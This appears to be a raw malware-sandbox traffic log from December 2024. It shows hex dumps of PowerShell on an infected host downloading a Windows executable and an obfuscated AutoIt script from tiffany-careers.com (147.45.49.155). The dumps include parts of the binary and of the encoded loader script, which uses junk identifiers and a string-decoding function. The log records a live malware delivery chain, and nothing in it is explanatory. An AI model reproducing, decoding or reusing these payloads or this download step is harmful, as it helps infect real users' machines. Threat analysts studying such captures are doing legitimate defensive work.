                                                                                                                  2024-12-23 06:11:50 UTC16384INData Raw: 8d 05 6a eb 06 00 48 89 45 f0 48 8d 05 5f fb 09 00 48 89 05 d8 2f 0d 00 48 8d 05 41 ec 06 00 48 c7 45 f8 00 00 00 00 0f 11 05 7a 2f 0d 00 c7 05 5c 2f 0d 00 01 00 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 d1 04 0a 00 48 89 05 ca 2f 0d 00 48 8d 05 4b f0 06 00 48 c7 45 f8 00 00 00 00 0f 29 05 6c 2f 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 f5 05 0a 00 48 89 05 c6 2f 0d 00 48 8d 05 c7 f1 06 00 48 c7 45 f8 00 00 00 00 0f 11 05 68 2f 0d 00 66 c7 05 ff 2e 0d 00 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 b8 ef 09 00 48 89 05 b9 2f 0d 00 48 8d 05 fe f3 06 00 48 c7 45 f8 00 00 00 00 0f 29 05 5b 2f 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 f4 05 0a 00 48 c7 45 f8 00 00 00 00 0f 11 05 65 2f 0d 00 48 89 05 a6 2f 0d 00 48 8d 05 bb 5a 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 a0 f7 09
                                                                                                                  Data Ascii: jHEH_H/HAHEz/\/EHEHH/HKHE)l/EHEHH/HHEh/f.EHEHH/HHE)[/EHEHHEe/H/HZEHEH
                                                                                                                  2024-12-23 06:11:50 UTC16384INData Raw: 00 c7 05 89 12 0d 00 02 00 00 00 66 c7 05 84 12 0d 00 00 00 c7 05 9a 12 0d 00 02 00 00 00 c7 05 94 12 0d 00 02 00 00 00 66 c7 05 8f 12 0d 00 00 00 c7 05 a5 12 0d 00 02 00 00 00 c7 05 9f 12 0d 00 03 00 00 00 66 c7 05 9a 12 0d 00 00 00 c7 05 b0 12 0d 00 01 00 00 00 c7 05 aa 12 0d 00 01 00 00 00 66 c7 05 a5 12 0d 00 00 00 48 89 05 a6 12 0d 00 48 c7 45 f8 00 00 00 00 48 8d 05 73 6a 08 00 48 89 45 f0 48 8d 05 d4 a4 09 00 0f 10 45 f0 48 89 05 a9 12 0d 00 48 8d 05 72 6c 08 00 48 89 45 f0 48 8d 05 17 b0 09 00 48 89 05 b8 12 0d 00 48 8d 05 99 6e 08 00 48 c7 45 f8 00 00 00 00 0f 29 05 5a 12 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 8b b1 09 00 48 89 05 b4 12 0d 00 48 8d 05 81 ab fe ff 48 c7 45 f8 00 00 00 00 0f 11 05 56 12 0d 00 c7 05 34 12 0d 00 02 00 00 00 0f 10 45
                                                                                                                  Data Ascii: ffffHHEHsjHEHEHHrlHEHHHnHE)ZEHEHHHHEV4E
                                                                                                                  2024-12-23 06:11:50 UTC16384INData Raw: 45 33 ff 48 8b 55 88 44 8b 4d a8 66 89 42 04 4c 8b 55 80 bb 52 00 00 00 4c 8b 85 a0 01 00 00 41 8b 88 88 00 00 00 8d 41 01 41 89 80 88 00 00 00 81 f9 fa 00 00 00 0f 8d dc 6b 04 00 b8 80 00 00 00 4d 8b d0 44 3b e8 0f 86 c5 54 04 00 49 8b 42 40 49 2b 42 20 48 d1 f8 48 89 45 18 48 89 55 c8 4c 8b b5 a8 01 00 00 41 8b cf 66 44 89 2a 45 8b c7 41 8b ba 98 00 00 00 49 8b c6 41 8b 5a 70 48 f7 d8 48 89 55 00 48 8d 45 10 48 1b d2 44 89 7d 10 48 23 d0 b8 87 00 00 00 48 89 54 24 70 44 3b e8 4c 89 54 24 68 41 8d 45 81 0f 94 c1 48 8d 55 00 41 3b c3 8b 85 98 01 00 00 41 0f 96 c0 03 c1 48 8b 8d 90 01 00 00 48 89 4c 24 60 48 8d 4d 38 48 89 4c 24 58 48 8d 4d 54 48 89 4c 24 50 48 8d 4d 50 48 89 4c 24 48 48 8d 8d 8c 00 00 00 48 89 4c 24 40 41 8b cc 89 44 24 38 89 74 24 30 48
                                                                                                                  Data Ascii: E3HUDMfBLURLAAAkMD;TIB@I+B HHEHULAfD*EAIAZpHHUHEHD}H#HT$pD;LT$hAEHUA;AHHL$`HM8HL$XHMTHL$PHMPHL$HHHL$@AD$8t$0H
                                                                                                                  2024-12-23 06:11:50 UTC16384INData Raw: 22 11 ff d0 48 83 c4 20 4c 8b 65 c0 4c 8b 6d c8 4c 8b 75 d0 4c 8b 7d d8 48 8b 5d e0 48 8b e5 5d c3 cc cc cc e9 8b 85 fe ff cc cc cc 40 53 48 83 ec 20 48 8b d9 eb 0f 48 8b cb e8 1d 46 00 00 85 c0 74 13 48 8b cb e8 5d 01 01 00 48 85 c0 74 e7 48 83 c4 20 5b c3 48 83 fb ff 74 06 e8 9f 09 00 00 cc e8 b9 09 00 00 cc e9 bf ff ff ff cc cc cc 48 83 ec 28 e8 57 0b 00 00 85 c0 74 21 65 48 8b 04 25 30 00 00 00 48 8b 48 08 eb 05 48 3b c8 74 14 33 c0 f0 48 0f b1 0d 9c a2 0c 00 75 ee 32 c0 48 83 c4 28 c3 b0 01 eb f7 cc cc cc 40 53 48 83 ec 20 0f b6 05 87 a2 0c 00 85 c9 bb 01 00 00 00 0f 44 c3 88 05 77 a2 0c 00 e8 86 09 00 00 e8 19 19 00 00 84 c0 75 04 32 c0 eb 14 e8 a4 5f 01 00 84 c0 75 09 33 c9 e8 35 19 00 00 eb ea 8a c3 48 83 c4 20 5b c3 cc cc cc 40 53 48 83 ec 40 80
                                                                                                                  Data Ascii: "H LeLmLuL}H]H]@SH HHFtH]HtH [HtH(Wt!eH%0HHH;t3Hu2H(@SH Dwu2_u35H [@SH@


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.549740147.45.49.1554437988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 06:11:56 UTC171OUTGET /gIpBYOi HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                  Host: tiffany-careers.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-12-23 06:11:57 UTC397INHTTP/1.1 200 OK
                                                                                                                  etag: "da2a8-67671061-23c44;;;"
                                                                                                                  last-modified: Sat, 21 Dec 2024 19:00:49 GMT
                                                                                                                  content-length: 893608
                                                                                                                  accept-ranges: bytes
                                                                                                                  date: Mon, 23 Dec 2024 06:11:57 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                  connection: close
                                                                                                                  2024-12-23 06:11:57 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDR*R*R*CP*S*_@a*_@*_@g*[j[*[jw*R+r**S*_@S*RP*S*RichR*
                                                                                                                  2024-12-23 06:11:57 UTC16384INData Raw: 03 03 04 55 8b ec 56 8b f1 e8 b2 01 00 00 8a 45 08 88 06 8b c6 c7 46 0c 09 00 00 00 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 20 53 56 57 8b f9 89 7d f8 e8 a5 fb ff ff 8b 37 8b ce e8 04 fa ff ff 8b 06 8b 5d 08 c7 80 10 02 00 00 00 00 00 00 8b 5b 08 89 5d f4 85 db 0f 84 b2 00 00 00 53 6a 01 ff 37 e8 cd f8 ff ff 83 c4 0c 33 f6 85 db 0f 84 9b 00 00 00 8b 45 08 6a 10 8b 40 04 8b 1c b0 e8 56 c3 01 00 8b f8 83 c4 04 85 ff 74 7e 8b 0b 89 0f 8b 4b 04 89 4f 04 8b 4b 08 89 4f 08 8b 43 0c 89 47 0c ff 00 8b 5d f8 8d 45 e4 56 6a 01 50 ff 33 89 7d ec c7 45 f0 04 00 00 00 e8 04 f7 ff ff 83 c4 10 85 ff 74 21 8b 47 0c ff 08 8b 47 0c 83 38 00 0f 84 34 8d 03 00 57 e8 72 c3 01 00 83 c4 04 c7 45 ec 00 00 00 00 46 c7 45 f0 01 00 00 00 c7 45 e4
                                                                                                                  Data Ascii: UVEF^]U SVW}7][]Sj73Ej@Vt~KOKOCG]EVjP3}Et!GG84WrEFEE
                                                                                                                  2024-12-23 06:11:57 UTC16384INData Raw: 13 ca 99 3b 45 fc 0f 85 a9 88 03 00 3b d1 0f 85 a1 88 03 00 8b 45 ec 89 03 8b 55 d8 89 55 fc 8b 4b 08 85 c9 0f 85 d4 88 03 00 8b 4d e0 85 c9 0f 85 e1 88 03 00 8b 45 e4 83 f8 05 0f 8d ed 88 03 00 d9 ee dd 55 d8 c7 45 e4 03 00 00 00 8b 4e 0c 8b c1 c1 e0 06 8b 80 14 5f 4a 00 83 f8 03 0f 85 6c 89 03 00 83 f9 01 0f 85 18 8a 03 00 db 06 de d9 df e0 f6 c4 05 0f 8b 8d 89 03 00 8b 4f 1c 8b c1 c1 e0 04 03 43 0c 8b 04 85 08 5f 4a 00 83 f8 01 0f 85 93 00 00 00 83 f9 01 0f 85 6a 8b 03 00 8b 47 10 89 45 fc 8b f0 8b 43 0c 83 f8 01 0f 85 f9 8b 03 00 8b 03 3b f0 7c 29 8b 4f 04 8b 45 0c 41 89 08 8b 4d e0 85 c9 0f 85 89 8c 03 00 8b 45 e4 83 f8 05 0f 8d 8f 8c 03 00 5f 5e 5b 8b e5 5d c2 08 00 8b 75 f8 81 c6 5c 01 00 00 80 7e 09 00 0f 85 45 8c 03 00 80 7e 08 00 75 5f 8b 7e 04
                                                                                                                  Data Ascii: ;E;EUUKMEUEN_JlOC_JjGEC;|)OEAME_^[]u\~E~u_~
                                                                                                                  2024-12-23 06:11:57 UTC16384INData Raw: 93 00 00 00 e9 cf 7c 03 00 8b 41 04 6a 7f 59 66 39 48 08 0f 85 b2 7c 03 00 8b 45 f8 48 4e 83 7d 94 00 89 45 f8 74 2e 8d 4d 94 e8 51 34 01 00 8d 4d 94 8b 18 e8 55 34 01 00 8b 45 f8 85 c0 78 08 3b f3 0f 84 1d fd ff ff 57 6a 78 e9 88 7c 03 00 8d 5e 01 eb 9d 8d 5e 01 eb e2 8d 5e 01 e9 45 fd ff ff 8d 5e 01 e9 17 fe ff ff 8b ff a9 c8 40 00 b3 48 44 00 5e cb 40 00 6e cb 40 00 41 ca 40 00 9b cb 40 00 09 cc 40 00 80 cb 40 00 cf cb 40 00 4f c9 40 00 70 c9 40 00 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 1c 53 56 57 8b 7d 08 33 f6 ba 01 00 00 00 89 74 24 18 89 74 24 20 8b d9 89 54 24 24 8b 47 04 89 74 24 10 8b 00 89 44 24 14 0f bf 40 08 83 f8 33 75 28 57 e8 a0 cf ff ff 8b 4c 24 20 85 c9 75 3c 8b 74 24 18 8b 54 24 24 83 fa 05 0f 8d a8 7c 03 00 5f 5e 5b 8b e5 5d
                                                                                                                  Data Ascii: |AjYf9H|EHN}Et.MQ4MU4Ex;Wjx|^^^E^@HD^@n@A@@@@@O@p@USVW}3t$t$ T$$Gt$D$@3u(WL$ u<t$T$$|_^[]
                                                                                                                  2024-12-23 06:11:57 UTC16384INData Raw: 00 00 8b 5d 10 33 c0 6a ff 50 8b cb c6 45 cf 00 89 45 a0 e8 69 0d 00 00 83 7d 0c 00 75 04 c6 45 cf 01 8d 4d d0 e8 dd 05 00 00 8d 4d b4 e8 d5 05 00 00 33 d2 33 f6 89 55 c4 89 75 f0 8d 64 24 00 80 7d cf 00 0f 84 bf df 03 00 83 7f 14 00 0f 84 89 03 00 00 80 7f 10 00 0f 84 7f 03 00 00 83 fa ff 0f 84 76 03 00 00 8b 4f 1c 3b d1 0f 8f 6b 03 00 00 ff 77 24 8b 47 34 ff 77 20 0b 47 2c 50 52 8b 57 18 51 ff 37 8b 4f 14 e8 12 ea ff ff 8b c8 83 c4 18 89 4f 28 85 c9 0f 8e 30 03 00 00 8b 47 20 8b 50 04 c7 47 2c 00 00 00 00 8b 18 3b 58 04 89 5d c8 8b 5d 10 0f 84 5c df 03 00 89 55 c4 85 c9 0f 84 16 03 00 00 8b 47 20 8b 30 8b 45 f0 2b f0 0f 84 a3 02 00 00 8b 4f 04 3b c1 0f 83 98 02 00 00 83 fe ff 0f 84 2c 03 00 00 03 c6 3b c1 0f 87 1f 03 00 00 8b 4d c0 8b 01 83 f8 01 0f 8f
                                                                                                                  Data Ascii: ]3jPEEi}uEMM33Uud$}vO;kw$G4w G,PRWQ7OO(0G PG,;X]]\UG 0E+O;,;M
                                                                                                                  2024-12-23 06:11:58 UTC16384INData Raw: b8 00 47 3b 7e 08 73 e0 eb e5 56 8b f1 c7 06 c4 09 49 00 e8 c5 ff ff ff ff 76 04 e8 3c c4 00 00 59 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b d9 57 33 ff 39 7b 08 76 40 56 8d 64 24 00 8b 73 04 8b 34 be 85 f6 74 16 8b 46 0c ff 08 8b 46 0c 83 38 00 74 29 56 e8 ff c3 00 00 83 c4 04 8b 43 04 c7 04 b8 00 00 00 00 47 3b 7b 08 72 d0 c7 43 08 00 00 00 00 5e 5f 5b c3 89 7b 08 eb f8 ff 36 e8 d5 c3 00 00 ff 76 0c e8 cd c3 00 00 83 c4 08 eb c3 55 8b ec 56 8b f1 8b 46 0c 39 46 08 75 2f 8d 0c 00 6a 08 58 3b c8 73 5f 57 33 c9 89 46 0c 6a 04 5a f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 22 c3 00 00 83 7e 04 00 8b f8 59 75 42 89 7e 04 5f 6a 10 e8 0e c3 00 00 8b d0 59 85 d2 74 51 8b 45 08 8b 08 89 0a 8b 48 04 89 4a 04 8b 48 08 89 4a 08 8b 40 0c 89 42 0c ff 00 8b 4e 08 8b 46
                                                                                                                  Data Ascii: G;~sVIv<Y^SW39{v@Vd$s4tFF8t)VCG;{rC^_[{6vUVF9Fu/jX;s_W3FjZQ"~YuB~_jYtQEHJHJ@BNF
                                                                                                                  2024-12-23 06:11:58 UTC16384INData Raw: 05 f4 2b 4c 00 38 04 47 00 c7 05 f8 2b 4c 00 00 00 00 00 c7 05 fc 2b 4c 00 00 00 00 00 c7 05 00 2c 4c 00 02 00 00 00 c7 05 04 2c 4c 00 02 00 00 00 c6 05 08 2c 4c 00 00 c7 05 0c 2c 4c 00 08 15 49 00 c7 05 18 2c 4c 00 94 04 47 00 c7 05 1c 2c 4c 00 00 00 00 00 c7 05 20 2c 4c 00 00 00 00 00 c7 05 24 2c 4c 00 02 00 00 00 c7 05 28 2c 4c 00 02 00 00 00 c6 05 2c 2c 4c 00 00 c7 05 30 2c 4c 00 28 15 49 00 c7 05 3c 2c 4c 00 f0 04 47 00 c7 05 40 2c 4c 00 00 00 00 00 c7 05 44 2c 4c 00 00 00 00 00 c7 05 48 2c 4c 00 02 00 00 00 c7 05 4c 2c 4c 00 02 00 00 00 c6 05 50 2c 4c 00 00 c7 05 54 2c 4c 00 4c 15 49 00 c7 05 60 2c 4c 00 30 05 47 00 c7 05 64 2c 4c 00 00 00 00 00 c7 05 68 2c 4c 00 00 00 00 00 c7 05 6c 2c 4c 00 02 00 00 00 c7 05 70 2c 4c 00 03 00 00 00 c6 05 74 2c 4c
                                                                                                                  Data Ascii: +L8G+L+L,L,L,L,LI,LG,L ,L$,L(,L,,L0,L(I<,LG@,LD,LH,LL,LP,LT,LLI`,L0Gd,Lh,Ll,Lp,Lt,L
                                                                                                                  2024-12-23 06:11:58 UTC16384INData Raw: cb 41 00 a6 cb 41 00 9d 12 45 00 ba 12 45 00 71 cb 41 00 ae cb 41 00 61 12 45 00 6e 12 45 00 ef 12 45 00 ff 12 45 00 0d 13 45 00 27 13 45 00 b4 cb 41 00 55 8b ec 83 ec 10 53 8b d9 89 4d f0 56 33 c9 57 8b fa 41 89 7d f4 33 d2 89 4d f8 0f b7 03 8d 73 04 b9 85 00 00 00 c7 45 fc 01 00 00 00 66 3b c1 0f 84 c8 00 00 00 83 c1 05 66 3b c1 0f 84 bc 00 00 00 b9 86 00 00 00 66 3b c1 0f 84 ae 00 00 00 83 c1 05 66 3b c1 0f 84 a2 00 00 00 0f b7 06 3d a1 00 00 00 0f 87 e4 00 00 00 0f b6 80 0f ce 41 00 ff 24 85 8b cd 41 00 ff 75 08 ff 75 0c 52 8d 56 02 8b cf e8 f5 01 00 00 83 c4 0c 33 d2 8b 4d f8 8b 5d f0 6a 77 0f b7 43 02 8d 1c 43 58 89 5d f0 66 39 03 0f 84 71 ff ff ff 8b c1 5f 5e 5b 8b e5 5d c3 66 83 3e 70 8b ca 0f 84 ea 47 03 00 8d 4e 02 83 c6 22 85 c9 74 12 6a 20 8b
                                                                                                                  Data Ascii: AAEEqAAaEnEEEE'EAUSMV3WA}3MsEf;f;f;f;=A$AuuRV3M]jwCCX]f9q_^[]f>pGN"tj
                                                                                                                  2024-12-23 06:11:58 UTC16384INData Raw: 33 41 fe ff 8d 45 e8 50 ff 77 08 e8 1a 34 ff ff ff 75 e8 68 a8 2c 49 00 56 e8 e7 3e 00 00 83 c4 0c 89 45 f8 80 7d ff 00 0f 85 12 5d 03 00 8d 4d e8 e8 80 10 ff ff 8b 7d f8 56 e8 8b 40 00 00 59 83 fb ff 74 19 53 56 e8 ba 3c 00 00 59 50 e8 e1 3a 00 00 59 59 8b c7 5f 5e 5b 8b e5 5d c3 68 00 40 00 00 eb e1 55 8b ec 51 51 56 57 8b f9 c7 45 f8 01 00 00 00 33 c0 8b f2 88 45 ff 85 ff 74 74 8b 06 0f b7 04 47 50 e8 e1 2b 00 00 59 85 c0 75 67 8b 0e 33 d2 53 8b 5d 08 0f b7 04 4f 89 13 83 e8 2b 74 5c 48 48 74 54 8b 06 66 39 14 47 74 32 8b 06 0f b7 04 47 50 e8 d3 31 00 00 59 85 c0 74 21 6b 03 0a 8b 16 c6 45 ff 01 0f b7 0c 57 83 c0 d0 03 c1 8d 4a 01 89 03 33 c0 89 0e 66 39 04 4f 75 ce 8b 0b 0f af 4d f8 8a 45 ff 89 0b 5b 5f 5e 8b e5 5d c3 32 c0 eb f6 ff 06 eb 84 83 4d f8
                                                                                                                  Data Ascii: 3AEPw4uh,IV>E}]M}V@YtSV<YP:YY_^[]h@UQQVWE3EttGP+Yug3S]O+t\HHtTf9Gt2GP1Yt!kEWJ3f9OuME[_^]2M
                                                                                                                  2024-12-23 06:11:58 UTC16384INData Raw: 00 8b c3 e8 6d 3f 00 00 c3 8b 5d e4 8b 7d 08 57 e8 98 22 00 00 59 c3 55 8b ec 56 8b 75 08 85 f6 75 09 56 e8 fb 00 00 00 59 eb 2f 56 e8 2c 00 00 00 59 85 c0 74 05 83 c8 ff eb 1f f7 46 0c 00 40 00 00 74 14 56 e8 bc fc ff ff 50 e8 26 a4 00 00 f7 d8 59 59 1b c0 eb 02 33 c0 5e 5d c3 55 8b ec 53 56 8b 75 08 33 db 8b 46 0c 24 03 3c 02 75 42 f7 46 0c 08 01 00 00 74 39 57 8b 3e 2b 7e 08 85 ff 7e 2e 57 ff 76 08 56 e8 79 fc ff ff 59 50 e8 22 8e 00 00 83 c4 0c 3b c7 75 0f 8b 46 0c 84 c0 79 0f 83 e0 fd 89 46 0c eb 07 83 4e 0c 20 83 cb ff 5f 8b 4e 08 8b c3 83 66 04 00 89 0e 5e 5b 5d c3 6a 01 e8 5b 00 00 00 59 c3 6a 0c 68 30 cc 4b 00 e8 5a 3e 00 00 33 ff 89 7d e4 8b 75 08 85 f6 75 09 57 e8 3b 00 00 00 59 eb 24 56 e8 4d 21 00 00 59 89 7d fc 56 e8 1c ff ff ff 59 8b f8 89
                                                                                                                  Data Ascii: m?]}W"YUVuuVY/V,YtF@tVP&YY3^]USVu3F$<uBFt9W>+~~.WvVyYP";uFyFN _Nf^[]j[Yjh0KZ>3}uuW;Y$VM!Y}VY


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.549759147.45.49.1554437728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 06:12:01 UTC80OUTGET /ygUmFny.txt HTTP/1.1
                                                                                                                  Host: tiffany-careers.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-12-23 06:12:02 UTC425INHTTP/1.1 200 OK
                                                                                                                  etag: "119282-6767105a-23c2d;;;"
                                                                                                                  last-modified: Sat, 21 Dec 2024 19:00:42 GMT
                                                                                                                  content-type: text/plain
                                                                                                                  content-length: 1151618
                                                                                                                  accept-ranges: bytes
                                                                                                                  date: Mon, 23 Dec 2024 06:12:02 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                  connection: close
                                                                                                                  2024-12-23 06:12:02 UTC16384INData Raw: 46 75 6e 63 20 4e 75 74 72 69 74 69 6f 6e 53 70 65 65 64 4d 61 79 6f 72 46 61 6d 69 6c 69 65 73 28 24 53 6d 4b 69 73 73 2c 20 24 45 66 66 69 63 69 65 6e 74 6c 79 46 6f 72 6d 75 6c 61 2c 20 24 43 6f 6e 73 75 6c 74 69 6e 67 53 6f 72 74 73 4c 61 62 73 2c 20 24 66 75 72 74 68 65 72 74 65 72 72 6f 72 69 73 74 2c 20 24 42 49 4b 45 4f 43 43 55 52 52 45 4e 43 45 53 4c 49 47 48 54 2c 20 24 52 65 76 65 72 73 65 50 68 69 6c 69 70 70 69 6e 65 73 29 0a 24 50 64 42 6c 6f 63 6b 73 52 65 73 70 6f 6e 73 65 44 61 74 20 3d 20 27 37 33 39 31 31 39 36 31 38 37 37 32 27 0a 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 0a 24 69 6f 73 79 6d 70 68 6f 6e 79 73 65 65 6d 73 63 72 75 63 69 61 6c 20 3d 20 35 30 0a 46 6f 72 20 24
                                                                                                                  Data Ascii: Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)$PdBlocksResponseDat = '739119618772'$VerifiedUnderstoodValidation = 34$iosymphonyseemscrucial = 50For $
                                                                                                                  2024-12-23 06:12:02 UTC16384INData Raw: 63 75 72 72 65 64 4c 61 79 6f 75 74 20 3d 20 38 38 20 54 68 65 6e 0a 24 52 45 4a 45 43 54 52 45 53 45 52 56 4f 49 52 4c 4f 43 4b 45 4e 4a 4f 59 45 44 20 3d 20 38 39 0a 24 53 57 49 53 53 45 53 50 4e 53 48 45 46 46 49 45 4c 44 20 3d 20 38 30 0a 46 6f 72 20 24 48 79 52 58 65 76 4d 20 3d 20 35 36 20 54 6f 20 33 33 30 0a 49 66 20 24 52 45 4a 45 43 54 52 45 53 45 52 56 4f 49 52 4c 4f 43 4b 45 4e 4a 4f 59 45 44 20 3d 20 38 37 20 54 68 65 6e 0a 45 78 70 28 32 30 31 36 29 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 57 61 6c 65 73 28 22 36 36 5d 31 31 31 5d 39 38 5d 31 30 39 5d 31 31 32 5d 31 30 34 5d 33 34 5d 37 31 5d 31 30 32 5d 39 38 5d 31 31 37 5d 33 34 5d 36 36 5d 31 30 39 5d 31 30 34 5d 31 30 32 5d 31 31 35 5d 31 30 36 5d 39 38 5d 33 34 5d 38 33 5d 31 30 32
                                                                                                                  Data Ascii: curredLayout = 88 Then$REJECTRESERVOIRLOCKENJOYED = 89$SWISSESPNSHEFFIELD = 80For $HyRXevM = 56 To 330If $REJECTRESERVOIRLOCKENJOYED = 87 ThenExp(2016)PixelGetColor(Wales("66]111]98]109]112]104]34]71]102]98]117]34]66]109]104]102]115]106]98]34]83]102
                                                                                                                  2024-12-23 06:12:02 UTC16384INData Raw: 6d 65 6c 69 6e 65 20 3d 20 35 37 0a 24 46 6f 72 75 6d 73 49 73 74 61 6e 62 75 6c 20 3d 20 37 38 0a 57 68 69 6c 65 20 31 33 0a 49 66 20 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20 3d 20 35 35 20 54 68 65 6e 0a 44 65 63 28 57 61 6c 65 73 28 22 38 31 5d 31 31 38 5d 31 32 34 5d 31 30 32 22 2c 34 30 2f 35 29 29 0a 41 43 6f 73 28 31 30 30 33 29 0a 44 65 63 28 57 61 6c 65 73 28 22 31 31 37 5d 31 30 34 5d 31 30 32 5d 31 32 34 5d 31 30 32 5d 31 31 31 5d 31 30 38 5d 31 31 33 5d 31 30 36 5d 34 38 5d 31 31 39 5d 31 30 38 5d 31 30 34 5d 34 38 22 2c 33 2f 31 29 29 0a 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20 3d 20 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20
                                                                                                                  Data Ascii: meline = 57$ForumsIstanbul = 78While 13If $MeasureTimeline = 55 ThenDec(Wales("81]118]124]102",40/5))ACos(1003)Dec(Wales("117]104]102]124]102]111]108]113]106]48]119]108]104]48",3/1))$MeasureTimeline = $MeasureTimeline + 1EndIfIf $MeasureTimeline
                                                                                                                  2024-12-23 06:12:02 UTC16384INData Raw: 39 31 5d 31 32 39 5d 31 31 38 5d 31 30 38 5d 31 31 33 5d 31 30 37 5d 31 30 35 5d 31 32 34 5d 31 31 33 5d 31 31 39 5d 31 31 38 5d 35 35 5d 37 33 5d 31 32 36 5d 31 30 35 5d 31 31 33 5d 31 31 36 5d 31 30 35 5d 31 30 36 5d 31 31 36 5d 31 30 39 5d 35 35 22 2c 36 34 2f 38 29 29 0a 41 54 61 6e 28 39 30 34 38 29 0a 24 6c 69 73 61 6b 6e 6f 77 6c 65 64 67 65 73 74 6f 72 6d 73 68 61 72 70 69 6e 73 69 67 68 74 20 3d 20 24 6c 69 73 61 6b 6e 6f 77 6c 65 64 67 65 73 74 6f 72 6d 73 68 61 72 70 69 6e 73 69 67 68 74 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 54 72 61 64 69 6e 67 4c 6f 6c 20 3d 20 33 39 0a 24 43 4f 4e 56 45 4e 49 45 4e 54 44 45 42 55 47 4e 44 4d 41 44 4f 4e 4e 41 20 3d 20 37 35 0a 57 68 69 6c 65 20 33 38 39 0a 49 66 20 24 54 72 61 64 69 6e 67 4c 6f
                                                                                                                  Data Ascii: 91]129]118]108]113]107]105]124]113]119]118]55]73]126]105]113]116]105]106]116]109]55",64/8))ATan(9048)$lisaknowledgestormsharpinsight = $lisaknowledgestormsharpinsight + 1EndIfNext$TradingLol = 39$CONVENIENTDEBUGNDMADONNA = 75While 389If $TradingLo
                                                                                                                  2024-12-23 06:12:02 UTC16384INData Raw: 73 28 22 38 32 5d 31 32 31 5d 31 30 34 5d 31 31 37 5d 31 32 31 5d 31 30 38 5d 31 30 34 5d 31 32 32 5d 34 38 5d 38 36 5d 31 30 34 5d 31 31 33 5d 31 31 39 5d 31 30 34 5d 31 31 33 5d 31 30 32 5d 31 30 34 5d 31 31 38 5d 34 38 22 2c 39 2f 33 29 2c 20 57 61 6c 65 73 28 22 38 32 5d 31 32 31 5d 31 30 34 5d 31 31 37 5d 31 32 31 5d 31 30 38 5d 31 30 34 5d 31 32 32 5d 34 38 5d 38 36 5d 31 30 34 5d 31 31 33 5d 31 31 39 5d 31 30 34 5d 31 31 33 5d 31 30 32 5d 31 30 34 5d 31 31 38 5d 34 38 22 2c 39 2f 33 29 29 0a 41 43 6f 73 28 39 34 36 37 29 0a 24 77 61 69 74 73 75 73 73 65 78 20 3d 20 24 77 61 69 74 73 75 73 73 65 78 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 57 69 64 65 73 63 72 65 65 6e 54 72 61 69 6e 41 6e 61 74 6f 6d 79 20 3d 20 34 39 0a 24 72 65 6c 61 74
